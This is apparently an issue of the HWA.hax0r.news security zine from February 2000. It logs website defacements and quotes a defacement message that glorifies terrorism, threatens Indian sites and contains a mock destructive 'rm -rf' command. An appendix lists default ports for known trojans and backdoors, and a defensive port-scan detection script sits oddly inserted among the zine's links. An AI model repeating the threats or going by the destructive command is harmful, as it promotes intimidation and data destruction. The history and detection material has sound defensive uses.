Site Title: Council of Conservative Citizens
Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.cofcc.org
Operating System: Solaris
Potentially offensive content on defaced page.
ATTRITION Staff Comment: Political Defacement

Defaced domain: www.uqi.edu.mx
Site Title: Universidad Quetzalcoatl de Irapuato
Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.uqi.edu.mx
Defaced by: Gupo and Ka0s
Operating System: Windows NT

Defaced domain: www.interpower.com
Site Title: Panel Components Corporation
Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.interpower.com
Defaced by: verb0
Operating System: Windows NT

Defaced domain: www.maliembassy-usa.org
Site Title: Mali Embassy in the US
Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.maliembassy-usa.org
Defaced by: Check0ut
Operating System: Red Hat Linux
Potentially offensive content on defaced page.

Defaced domain: www.bandaelrecodo.com.mx
Site Title: RED 2000
Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.bandaelrecodo.com.mx
Defaced by: AloneX
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.comercialcarvalho.com.br
Site Title: Carvalho e fernandes Ltda
Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.comercialcarvalho.com.br
Defaced by: Crime Boy's
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.santafeciudad.gov.ar
Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.santafeciudad.gov.ar
Defaced by: KabraLzZ
Operating System: BSDI 4.0.1
Potentially offensive content on defaced page.

Defaced domain: www.texasmint.com
Site Title: texas mint
Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.texasmint.com
Operating System: Windows NT (IIS/4.0)
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.

Defaced domain: www.clairant.com
Site Title: Allard Group
Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.clairant.com
Defaced by: artech
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.abn.com.br
Site Title: ABN Agencia Brasileira de Noticias
Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.abn.com.br
Defaced by: Death Knights
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.bewear0303.com
Site Title: David Tennyson
Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.bewear0303.com
Defaced by: artech
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.firstgpa.com
Site Title: First American Group Purchasing Association
Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.firstgpa.com
Defaced by: wkD
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.19 by relogic
Potentially offensive content on defaced page.

Defaced domain: www.rupeesaver.com
Site Title: Quicksell Communications
Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.rupeesaver.com
Defaced by: artech
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.firstmusic.com
Site Title: FM Design
Mirror: http://www.attrition.org/mirror/attrition/2000/02/08/www.firstmusic.com
Defaced by: Team Echo
Operating System: Solaris
Potentially offensive content on defaced page.

Defaced domain: www.miniskirt-jp.com
Site Title: JP Miniskirts
Mirror: http://www.attrition.org/mirror/attrition/2000/02/08/www.miniskirt-jp.com
Defaced by: Trent
Operating System: Red Hat Linux
Potentially offensive content on defaced page.
ATTRITION Staff Comment: Yet another bi-polar, manic-depressive kid with a God complex and an obsession with a female.

Defaced domain: www.unixcctv.com
Site Title: Unix CCTV
Mirror: http://www.attrition.org/mirror/attrition/2000/02/09/www.unixcctv.com
Defaced by: sabu
Operating System: FreeBSD 2.2.1 - 4.0
Potentially offensive content on defaced page.
Defaced domain: www.nasulgc.org
Site Title: National Association of State Universities and Land-Grant Colleges
Mirror: http://www.attrition.org/mirror/attrition/2000/02/09/www.nasulgc.org
Defaced by: ZeroForce
Operating System: Windows NT

Defaced domain: www.newmilltrout.com
Site Title: Newmill Trout & Deer Farm
Mirror: http://www.attrition.org/mirror/attrition/2000/02/09/www.newmilltrout.com
Defaced by: Team Echo
Potentially offensive content on defaced page.

Defaced domain: newmilltrout.com
Site Title: Newmill Trout & Deer Farm
Mirror: http://www.attrition.org/mirror/attrition/2000/02/09/newmilltrout.com
Defaced by: Team Echo
Operating System: Solaris
Potentially offensive content on defaced page.

Defaced domain: ip-250.la.com
Site Title: LA.COM
Mirror: http://www.attrition.org/mirror/attrition/2000/02/09/ip-250.la.com
Defaced by: Mindmelt
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.familycomputerworkshop.com
Site Title: Family Computer Workshop
Mirror: http://www.attrition.org/mirror/attrition/2000/02/09/www.familycomputerworkshop.com
Defaced by: Crime Boys
Operating System: Windows NT
Previously defaced on many times by
Potentially offensive content on defaced page.
ATTRITION Staff Comment: redefacing is lame.

Defaced domain: www.chickenchoker.com
Site Title: Sean Flanigan
Mirror: http://www.attrition.org/mirror/attrition/2000/02/09/www.chickenchoker.com
Defaced by: Sabu
Operating System: FreeBSD
Potentially offensive content on defaced page.

Defaced domain: fortleehs.hypermart.net
Site Title: Hypermart, Inc.
Mirror: http://www.attrition.org/mirror/attrition/2000/02/09/fortleehs.hypermart.net
Defaced by: team inifnity
Operating System: BSDI

Defaced domain: www.l33to.com
Site Title: l33to.com
Mirror: http://www.attrition.org/mirror/attrition/2000/02/09/www.l33to.com
Defaced by: team inifnity
Operating System: Linux

Defaced domain: www.troop.org
Site Title: Troop 62
Mirror: http://www.attrition.org/mirror/attrition/2000/02/10/www.troop.org
Defaced by: Team Echo
Operating System: NT
Potentially offensive content on defaced page.

Defaced domain: www.texasmint.com
Site Title: texas mint
Mirror: http://www.attrition.org/mirror/attrition/2000/02/10/www.texasmint.com
Defaced by: CRIME BOY'S
Operating System: NT
Potentially offensive content on defaced page.

Defaced domain: ohr.gsfc.nasa.gov
Site Title: National Aeronautics and Space Administration
Mirror: http://www.attrition.org/mirror/attrition/2000/02/10/ohr.gsfc.nasa.gov
Defaced by: mr_min
Operating System: NT
ATTRITION Staff Comment: Small notice at bottom of page.

Defaced domain: www.gosargon.com
Site Title: Sargon Consulting
Mirror: http://www.attrition.org/mirror/attrition/2000/02/10/www.gosargon.com
Defaced by: kidblount
Operating System: Solaris
HIDDEN comments in the HTML.
ATTRITION Staff Comment: See the HTML source code for the URL of the material used in this defacement

Defaced domain: www.clairant.com
Site Title: Allard Group
Mirror: http://www.attrition.org/mirror/attrition/2000/02/10/www.clairant.com
Defaced by: artech
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.whoisyourdaddy.net
Site Title: Mike Anderson
Mirror: http://www.attrition.org/mirror/attrition/2000/02/10/www.whoisyourdaddy.net
Defaced by: Ook-Ook
Operating System: Red Hat Linux
Potentially offensive content on defaced page.
Defaced domain: www.fumec.br Mirror: http://www.attrition.org/mirror/attrition/2000/02/10/www.fumec.br Defaced by: Death Knights Operating System: Linux Potentially offensive content on defaced page. Defaced domain: ohr.gsfc.nasa.gov Mirror: http://www.attrition.org/mirror/attrition/2000/02/10/ohr.gsfc.nasa.gov Defaced by: Cyber Fuckers Operating System: Windows NT (IIS/4.0 Potentially offensive content on defaced page. Defaced domain: www.portonet.pt Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.portonet.pt Defaced by: Ph0bic Operating System: Red Hat Linux Potentially offensive content on defaced page. Defaced domain: www.utahaccess.com Site Title: IWS Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.utahaccess.com Defaced by: RAT Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: netserv.mnet.it Site Title: Medianet s.r.l. is a member of the UPITEL consortium Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/netserv.mnet.it Defaced by: X-Gh0sT Operating System: Red Hat Linux Potentially offensive content on defaced page. Defaced domain: www.entertaineon.com Site Title: David Katz Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.entertaineon.com Defaced by: DLX Operating System: Linux HIDDEN comments in the HTML. Defaced domain: www.troop10.org Site Title: Boy Scout Troop 10 Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.troop10.org Potentially offensive content on defaced page. Defaced domain: www.hatfield.co.za Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.hatfield.co.za Defaced by: Saint Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.tips.com Site Title: Business Consulting Solutions, Inc Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.tips.com Defaced by: pimp Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. 
Defaced domain: www.seniorweb.nl Site Title: Stichting Seniorweb Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.seniorweb.nl Defaced by: Team Echo Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.aplomet.com Site Title: Applied Logical Methods Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.aplomet.com Defaced by: DHC Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.nrai.com Site Title: National Registered Agents, Inc Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.nrai.com Defaced by: i[S] Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.barker-realty.com Site Title: SpeedScape LLC Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.barker-realty.com Defaced by: DHC Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.genecochran.com Site Title: SpeedScape, LLC Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.genecochran.com Defaced by: DHC Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.fsbdongola.com Site Title: SpeedScape, LLC Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.fsbdongola.com Defaced by: DHC Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Site Title: Education Systems Corporation Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/fugazzi.educorp.edu Defaced by: DHC Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.mountainsportsltd.com Site Title: SpeedScape Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.mountainsportsltd.com Defaced by: DHC Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. 
Defaced domain: www.wabn.com Site Title: SpeedScape Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.wabn.com Defaced by: DHC Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Site Title: SpeedScape Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.vol-business.net Defaced by: DHC Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.troop35.org Site Title: Boy Scout Troup 35 Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.troop35.org Defaced by: Team Echo Operating System: Windows NT (IIS/3.0) Potentially offensive content on defaced page. Defaced domain: www.nationalbusiness.edu Site Title: National Business College Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.nationalbusiness.edu Defaced by: DHC Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.coverconnection.com Site Title: Patrick Wyss Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.coverconnection.com Defaced by: Sabu Operating System: FreeBSD Potentially offensive content on defaced page. Defaced domain: www.i2000.es Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.i2000.es Defaced by: kryptek Operating System: Solaris 2.5x Potentially offensive content on defaced page. Defaced domain: www.encontrefacil.com.br Site Title: Labin4 Laboratorio de Informatica Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.encontrefacil.com.br Defaced by: KabraLzZ Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.quantumdentistry.com Site Title: SpeedScape Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.quantumdentistry.com Defaced by: DHC Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. 
Defaced domain: eagles.eems.giles.k12.va.us Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/eagles.eems.giles.k12.va.us Defaced by: Team Echo Previously defaced on 99.12.21 by Potentially offensive content on defaced page. Defaced domain: www.triology.net Site Title: Tom Geoco Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.triology.net Operating System: OpenBSD 2.5 Potentially offensive content on defaced page. Defaced domain: www.teleplus.com.br Site Title: Teleplus Tecnologia Eletro Eletronica Ltda Mirror: http://www.attrition.org/mirror/attrition/2000/02/12/www.teleplus.com.br Defaced by: Crime Boys Operating System: Windows NT Potentially offensive content on defaced page. ATTRITION Staff Comment: mass hack: www.arlaisnet.com.br Defaced domain: www.fob.com.br Site Title: FOB Asset Management E Corretora De Seguros Mirror: http://www.attrition.org/mirror/attrition/2000/02/12/www.fob.com.br Defaced by: Crime Boys Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.e2.com Site Title: E2 Consultants Mirror: http://www.attrition.org/mirror/attrition/2000/02/12/www.e2.com Defaced by: Carte Blanche Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.iiaa.org Site Title: Independant Insurance Agents of America Mirror: http://www.attrition.org/mirror/attrition/2000/02/12/www.iiaa.org Defaced by: Team Echo Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. <<<<<<<<<<<<<<<<<<<<<<<<<<<-------[ END ]--------->>>>>>>>>>>>>>>>>>>>>>> Some of the more interesting messages from the above defacements: (re-formatted to fit 80 cols) http://www.attrition.org/mirror/attrition/2000/02/05/www.setindia.com :: [ m O s ] :: This defacement brought to you courtesy of "Harkat-ul-mOs". The Pakistan based terrorist organization that wants India to stop killing innocent civilians. (read women and children) YES! we are terrorists! 
<EXTRACT>
..... The man was stopped by an Indian army patrol 10 yards from his house,
20 minutes after curfew - his house had no toilet. Just before sunrise the
next day, his battered corpse was dumped in front of his house. Permission
for a proper funeral was refused, arrangements were made for a burial in a
local park. The women blocked the entrance of the park from the Indian Army
who were trying to stop the ceremony.
</EXTRACT>

<EXTRACT>
The Indian security forces in Kashmir have systematically violated the Code
of Medical Neutrality in Armed Conflict. During the curfew the security
forces have prevented medical personnel from evacuating injured people in
need of treatment. Ambulance drivers have been the principal victims of
these actions, frequently being stopped while on duty. A number have been
fired on and beaten, in some cases the medical personnel have been
detained, tortured and killed.
</EXTRACT>

<EXTRACT>
Torture is widely practiced in Kashmir as a means of extracting information
from detainees, coercing confessions, punishing persons believed
sympathetic to the militants and creating a climate of political
repression. Torture includes severe methods, which include the
psycho-torture: soldiers rape the detainee's wife in front of his eyes.
</EXTRACT>

<EXTRACT>
Patrols downtown. Military squads in the streets, they are looking for
militants. 01 Minute to evacuate their homes. Time limit expired. The
soldiers enter, bursts of gun fire. Entire families slaughtered. Flesh
burned five, ten, fifteen bodies bleeding now while I am writing far away
from Kashmir.
</EXTRACT>

source == http://www.kash-gt.dircon.co.uk/

Kashmir For The Kashmiris !

Kashmir is not a commodity for sale, nor should it be considered a prize
for India or Pakistan ! The people of Kashmir are not cattle, to be
butchered by one or herded by the other! Kashmiris are people dammit !
They have a right to live... to choose !

Take away the rights they have as human beings, and every muslim shall rise
against you ! We will keep "terrorizing" you, defacing sites until there
are no more Indian sites left that have yet to be defaced by the
:: [ m O s ] :: .... and start all over again !

Your data is not safe, for we are... the :: [ m O s ] :: of the Borg,
being an Indian is pathetic, you will be VIOLATED !@#$%!

Beware, for some day, someone might....

su God
rm -rf /earth/India*
echo "The world is now a better place, thank you for your patience. - mOs" > /etc/motd

Oh well.. time for the credits ;-)

Let us grab this opportunity to welcome a new member to the :: [ m O s ] ::
Say hello to Shahmir, hacked into the world on the 4th of January 2000.
Lets hope he turns out l33t0r than his father and uncle ;-)

Members : a-ngelz, ps, qrs, drac, evilroot, miller and Shahmir.

Greets : X-ORG, etC!, GForce, Makaveli Crew, s|ider, sephz, indica,
madsmurf, rigian, knight, norad, mo`, sn|per@undernet, heataz, Lycos,
viviana, h1gh, the attrition.org team, The NEWS Daily, The HINDU - an
alleged newspaper (yes we read the article *smoochies*), sharon stone,
barnaby jones (or however it's spelt), Stuart the mouse, Johnny Bravo, the
Indian Soldiers for selling guns to the freedom fighters, the Mujahideen,
and all the people supporting the Kashmiri cause !

Fuck-Yous : The U.N. for sitting on their fat asses all this time and doing
nothing, The U.S.A. for looking the other way while defenseless people are
being butchered, Amnesty International for not doing their part, The Hindu
"baniya", Bal Thakray - when you die (which IS going to be soon), we hope
they let the vultures violate every friggin' hole your body has to offer
before tearing you up, eating you piece by piece, digesting you and then
taking a royal dump in the river ganges (YES! we are SICK terrorists
!@#$%!), Jaswanth Singh - You give sikhs a bad BAD name dude, the pizza
dude for being this late, one k0nka@dalnet for being whatever he is -
k0nka mate.. here's looking at your sorry ass kid... _|_ , net21pk - the
"alleged" ISP, and all the people we've missed - you know who you are
guys, FUCK YOU !@

... and now we must bid you all adieu, but this we promise .... we shall
meet again !

Previous Works :
Indian Science Congress 2000 ( Archived Here )
Zee Networks ( Archived Here )

:: [ m O s ] :: - Zor Ka Jhatka, Dheray Se Lagay

==========================================================================

* Info supplied by the attrition.org mailing list.

Cracked webpage archives (list from attrition)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.attrition.org/
http://www.hackernews.com/archive/crackarch.html
http://www.freespeech.org/resistance/
http://www.rewted.org/cracked/
http://www.403-security.org/
http://www.projectgamma.com/defaced/
http://www.net-security.org/
http://www.netrus.net/users/beard/pages/hacks/
http://212.205.141.128/grhack/html/default_hacking.html
http://194.226.45.195/hacked/hacked.html
http://alldas.de/crkidx1.htm
http://www.turkeynews.net/Hacked
http://www.flashback.se/hack/
http://www.dutchthreat.org/
http://www.onething.com/archive/
http://www.2600.com/hacked_pages/
http://hysteria.sk/hacked/
http://erazor.vrnet.gr/

A simple yet elegant crack: http://careers.altavista.com/

Index of /

 Name              Last modified       Size  Description
 Parent Directory  12-May-1999 18:09      -
 ALTAVISTA         05-Feb-2000 10:56     0k
 EATS              05-Feb-2000 10:56     0k
 SHIT              05-Feb-2000 10:56     0k

Cracked sites listed oldest to most recent...
and more sites at the attrition cracked web sites mirror:

http://www.attrition.org/mirror/attrition/index.html

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________

By: joakim.von.braun@risab.se
Source: PSS

Common Trojan ports to watch for:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

After seeing several questions about traffic directed at ports such as
31337 and 12345 I've put together a list of all trojans known to me and
the default ports they are using. Of course several of them could use any
port, but I hope this list will maybe give you a clue of what might be
going on.

port 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
port 23 - Tiny Telnet Server
port 25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth,
          Terminator, WinPC, WinSpy
port 31 - Hackers Paradise
port 80 - Executor
port 456 - Hackers Paradise
port 555 - Ini-Killer, Phase Zero, Stealth Spy
port 666 - Satanz Backdoor
port 1001 - Silencer, WebEx
port 1011 - Doly Trojan
port 1170 - Psyber Stream Server, Voice
port 1234 - Ultors Trojan
port 1245 - VooDoo Doll
port 1492 - FTP99CMP
port 1600 - Shivka-Burka
port 1807 - SpySender
port 1981 - Shockrave
port 1999 - BackDoor
port 2001 - Trojan Cow
port 2023 - Ripper
port 2115 - Bugs
port 2140 - Deep Throat, The Invasor
port 2801 - Phineas Phucker
port 3024 - WinCrash
port 3129 - Masters Paradise
port 3150 - Deep Throat, The Invasor
port 3700 - Portal of Doom
port 4092 - WinCrash
port 4590 - ICQTrojan
port 5000 - Sockets de Troie
port 5001 - Sockets de Troie
port 5321 - Firehotcker
port 5400 - Blade Runner
port 5401 - Blade Runner
port 5402 - Blade Runner
port 5569 - Robo-Hack
port 5742 - WinCrash
port 6670 - DeepThroat
port 6771 - DeepThroat
port 6969 - GateCrasher, Priority
port 7000 - Remote Grab
port 7300 - NetMonitor
port 7301 - NetMonitor
port 7306 - NetMonitor
port 7307 - NetMonitor
port 7308 - NetMonitor
port 7789 - ICKiller
port 9872 - Portal of Doom
port 9873 - Portal of Doom
port 9874 - Portal of Doom
port 9875 - Portal of Doom
port 9989 - iNi-Killer
port 10067 - Portal of Doom
port 10167 - Portal of Doom
port 11000 - Senna Spy
port 11223 - Progenic trojan
port 12223 - Hack'99 KeyLogger
port 12345 - GabanBus, NetBus
port 12346 - GabanBus, NetBus
port 12361 - Whack-a-mole
port 12362 - Whack-a-mole
port 16969 - Priority
port 20001 - Millennium
port 20034 - NetBus 2 Pro
port 21544 - GirlFriend
port 22222 - Prosiak
port 23456 - Evil FTP, Ugly FTP
port 26274 - Delta
port 31337 - Back Orifice
port 31338 - Back Orifice, DeepBO
port 31339 - NetSpy DK
port 31666 - BOWhack
port 33333 - Prosiak
port 34324 - BigGluck, TN
port 40412 - The Spy
port 40421 - Masters Paradise
port 40422 - Masters Paradise
port 40423 - Masters Paradise
port 40426 - Masters Paradise
port 47262 - Delta
port 50505 - Sockets de Troie
port 50766 - Fore
port 53001 - Remote Windows Shutdown
port 61466 - Telecommando
port 65000 - Devil

You'll find the list on the following address:

http://www.simovits.com/nyheter9902.html

(still in Swedish but it will be translated in the near future).

To help anyone to detect trojan attacks, I'm planning to add information
about the original names of the executables, their size, where they
usually are hiding, and the names of any helpfiles they may use. I will
also add tools or links to tools that may be of your assistance.

Feel free to get back to me with any comments or suggestions. If you find
new trojans I'll love to get my hands on them, but please mail me first,
as I don't need more than one copy. If you have live experience of trojan
attacks I'm interested to read about your findings.

Joakim
joakim.von.braun@risab.se

A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a links
section on the http://welcome.to/HWA.hax0r.news/ url so check there for
current links etc.
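Going back to Joakim's default-port table in A.0 above: the obvious defender's use of such a list is to run it over connection logs. The following Python script is an added example for this issue, not code from Joakim or from the zine. It parses a constructed firewall-style log format (date, time, protocol, src:port -> dst:port, invented for the example), matches destination ports against a subset of the table above, and rates each source. It takes the caveat in the mail seriously: ports 21, 23, 25 and 80 are ordinary services, so a lone hit there is rated low, while one source touching several distinct trojan ports in a row is rated high, since that looks like someone sweeping for installed trojans rather than normal traffic.

```python
import re
from collections import defaultdict

# Subset of the default-port table above (A.0). A trojan can be configured to
# listen on any port, so a match is a lead to investigate, not proof.
TROJAN_PORTS = {
    21: ["Blade Runner", "Doly Trojan", "Fore", "Invisible FTP", "WebEx", "WinCrash"],
    23: ["Tiny Telnet Server"],
    25: ["Antigen", "Email Password Sender", "Haebu Coceda", "Shtrilitz Stealth",
         "Terminator", "WinPC", "WinSpy"],
    80: ["Executor"],
    1999: ["BackDoor"],
    2140: ["Deep Throat", "The Invasor"],
    6670: ["DeepThroat"],
    9872: ["Portal of Doom"],
    12345: ["GabanBus", "NetBus"],
    12346: ["GabanBus", "NetBus"],
    20034: ["NetBus 2 Pro"],
    21544: ["GirlFriend"],
    31337: ["Back Orifice"],
    31338: ["Back Orifice", "DeepBO"],
    65000: ["Devil"],
}

# Ports that also carry ordinary FTP/telnet/SMTP/HTTP traffic: a lone hit is noise.
NOISY_PORTS = {21, 23, 25, 80}

# Constructed log format for this example (not any real firewall's):
#   date time PROTO src:port -> dst:port
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<proto>TCP|UDP) "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}):(?P<sport>\d+) -> "
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):(?P<dport>\d+)"
)


def parse_line(line):
    """Return a dict for a well-formed record, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    e = m.groupdict()
    e["sport"] = int(e["sport"])
    e["dport"] = int(e["dport"])
    return e


def summarize(lines):
    """Group trojan-port hits by source address and rate each source.

    high   - two or more distinct non-noisy trojan ports (looks like a sweep)
    medium - exactly one non-noisy trojan port
    low    - only noisy ports (21/23/25/80), probably normal traffic
    """
    ports_by_src = defaultdict(set)
    for line in lines:
        e = parse_line(line)
        if e and e["dport"] in TROJAN_PORTS:
            ports_by_src[e["src"]].add(e["dport"])

    report = {}
    for src, ports in ports_by_src.items():
        strong = [p for p in ports if p not in NOISY_PORTS]
        if len(strong) >= 2:
            level = "high"
        elif strong:
            level = "medium"
        else:
            level = "low"
        report[src] = {
            "level": level,
            "ports": sorted(ports),
            "names": {p: TROJAN_PORTS[p] for p in sorted(ports)},
        }
    return report


# Constructed sample: normal web traffic, a single NetBus probe, one source
# sweeping several trojan ports, an unrelated HTTPS connection and a junk line.
SAMPLE_LOG = [
    "2000-02-10 03:12:44 TCP 10.1.1.20:1037 -> 192.168.1.5:80",
    "2000-02-10 03:12:45 TCP 10.1.1.20:1038 -> 192.168.1.5:80",
    "2000-02-10 03:13:01 TCP 172.16.4.9:2201 -> 192.168.1.5:12345",
    "2000-02-10 03:15:10 TCP 203.0.113.77:4040 -> 192.168.1.5:31337",
    "2000-02-10 03:15:11 TCP 203.0.113.77:4041 -> 192.168.1.5:12345",
    "2000-02-10 03:15:12 TCP 203.0.113.77:4042 -> 192.168.1.5:20034",
    "2000-02-10 03:15:13 TCP 203.0.113.77:4043 -> 192.168.1.5:6670",
    "2000-02-10 03:16:00 TCP 10.1.1.21:1500 -> 192.168.1.5:443",
    "this line is not a connection record",
]

if __name__ == "__main__":
    for src, info in sorted(summarize(SAMPLE_LOG).items()):
        print(f"{src:15} {info['level']:6} ports={info['ports']}")
        for port, names in info["names"].items():
            print(f"{'':15}   {port}: {', '.join(names)}")
```

On the sample above the sweeping source comes out "high" with four distinct ports, the lone NetBus probe "medium", and the plain web browsing "low"; the HTTPS connection and the junk line are ignored. To run it over a real log, replace SAMPLE_LOG with the file's lines and adjust LINE_RE to the firewall's actual record format.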
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/

HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp ** NEW **
http://datatwirl.intranova.net ** NEW **
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
http://net-security.org/hwahaxornews ** NEW **
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/zine/hwa/ *UPDATED*
http://www.ducktank.net/hwa/issues.html ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/

International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed

Belgium.......: http://securax.org/cum/ *New address*
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Croatia.......: http://security.monitor.hr
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Finland.......: http://hackunlimited.com/
Germany.......: http://www.alldas.de/
                http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa..: http://www.hackers.co.za
                http://www.hack.co.za
                ** Due to excessive network attacks this site is now being
                   mirrored at http://www.siliconinc.net/hack/
                http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
                and best security related e-zine.

.za (South Africa) sites contributed by wyzwun tnx guy...

Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.

@HWA

A.2 Hot Hits
    ~~~~~~~~

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Today the spotlight may be on you, some interesting machines that have
accessed these archives recently...
.gov and .mil activity

fitzgerald.ags.bnl.gov
zephyr1.pnl.gov
ihvideo.lewisham.gov.uk
shihonage.gsfc.nasa.gov
burnia.dmz.health.nsw.gov.au
ococ.oc.ca.gov
guardian.gov.sg
aragorn.dpa.act.gov.au
ipaccess.gov.ru
eagle-ts222.korea.army.mil
gate1.noc.usmc.mil
eagle-ts209.korea.army.mil
proxy.vandenberg.af.mil
lax.dcmdw.dla.mil
beowulf.ramstein.af.mil
cofcs71.aphis.usda.gov
samds4.sam.pentagon.mil
eg-016-045.eglin.af.mil
pacfa.evepier.navy.mil
obgate.hill.af.mil
biglost.inel.gov
marshall.state.gov
flatline.arc.nasa.gov
mars.istac.gov
gateway1.osd.mil
gateway3.osd.mil
elan5172.cbcph.navy.mil
proxy.gintic.gov.sg
doegate.doe.gov
sunspot.gsfc.nasa.gov
gate1.mcbh.usmc.mil
homer.nawcad.navy.mil
maggie.nawcad.navy.mil
lisa.nawcad.navy.mil
msproxy.transcom.mil
